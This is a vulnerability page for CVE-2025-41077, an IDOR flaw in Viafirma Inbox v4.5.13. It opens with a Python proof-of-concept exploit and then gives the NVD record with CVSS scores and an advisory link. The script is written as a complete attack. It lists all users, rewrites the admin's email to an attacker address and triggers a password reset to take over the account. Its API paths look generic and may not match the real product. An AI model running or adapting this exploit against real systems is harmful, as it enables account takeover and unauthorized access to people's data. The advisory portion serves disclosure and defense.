CVE-2025-41077

# CVE-2025-41077 PoC - Viafirma Inbox IDOR Vulnerability import requests import json TARGET_URL = "https://target-viafirma.com" ATTACKER_TOKEN = "attacker_auth_token_here" def enumerate_users(): """Enumerate all users via IDOR vulnerability""" headers = { "Authorization": f"Bearer {ATTACKER_TOKEN}", "Content-Type": "application/json" } # Step 1: List all users by manipulating the user ID parameter user_list_url = f"{TARGET_URL}/api/users/list" response = requests.get(user_list_url, headers=headers) users = response.json() print(f"[+] Found {len(users)} users:") for user in users: print(f" - ID: {user['id']}, Email: {user['email']}, Role: {user['role']}") return users def modify_user_email(target_user_id, new_email): """Modify target user's email via IDOR""" headers = { "Authorization": f"Bearer {ATTACKER_TOKEN}", "Content-Type": "application/json" } # Step 2: Modify target user's email by changing user_id parameter modify_url = f"{TARGET_URL}/api/users/{target_user_id}/update" payload = { "email": new_email, "user_id": target_user_id # IDOR: No proper ownership check } response = requests.post(modify_url, headers=headers, json=payload) if response.status_code == 200: print(f"[+] Successfully modified email for user {target_user_id} to {new_email}") return True else: print(f"[-] Failed to modify email: {response.text}") return False def reset_password_via_email(target_user_id, attacker_controlled_email): """Reset password using password recovery feature""" headers = { "Content-Type": "application/json" } # Step 3: Trigger password reset for the modified email reset_url = f"{TARGET_URL}/api/auth/password-reset" payload = { "email": attacker_controlled_email } response = requests.post(reset_url, headers=headers, json=payload) if response.status_code == 200: print(f"[+] Password reset email sent to attacker-controlled email") return True else: print(f"[-] Password reset failed: {response.text}") return False if __name__ == "__main__": # Example usage users = enumerate_users() if users: # Target admin user admin_user = next((u for u in users if u['role'] == 'admin'), None) if admin_user: attacker_email = "[email protected]" modify_user_email(admin_user['id'], attacker_email) reset_password_via_email(admin_user['id'], attacker_email)

{"cve": {"id": "CVE-2025-41077", "sourceIdentifier": "[email protected]", "published": "2026-01-12T15:16:03.057", "lastModified": "2026-01-29T20:09:57.783", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IDOR vulnerability has been found in Viafirma Inbox v4.5.13 that allows any authenticated user without privileges in the application to list all users, access and modify their data. This allows the user's email addresses to be modified and, subsequently, using the password recovery functionality to access the application by impersonating any user, including those with administrative permissions."}, {"lang": "es", "value": "Se ha encontrado una vulnerabilidad IDOR en Viafirma Inbox v4.5.13 que permite a cualquier usuario autenticado sin privilegios en la aplicación listar a todos los usuarios, acceder y modificar sus datos. Esto permite que las direcciones de correo electrónico de los usuarios sean modificadas y, posteriormente, utilizando la funcionalidad de recuperación de contraseña, acceder a la aplicación suplantando a cualquier usuario, incluyendo aquellos con permisos administrativos."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:viafirma:inbox:*:*:*:*:*:-:*:*", "versionEndExcluding": "4.5.27", "matchCriteriaId": "A8EAEA5C-21C2-46A7-9151-5FCC1A8AF3DF"}]}]}], "references": [{"url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-viafirma-products", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}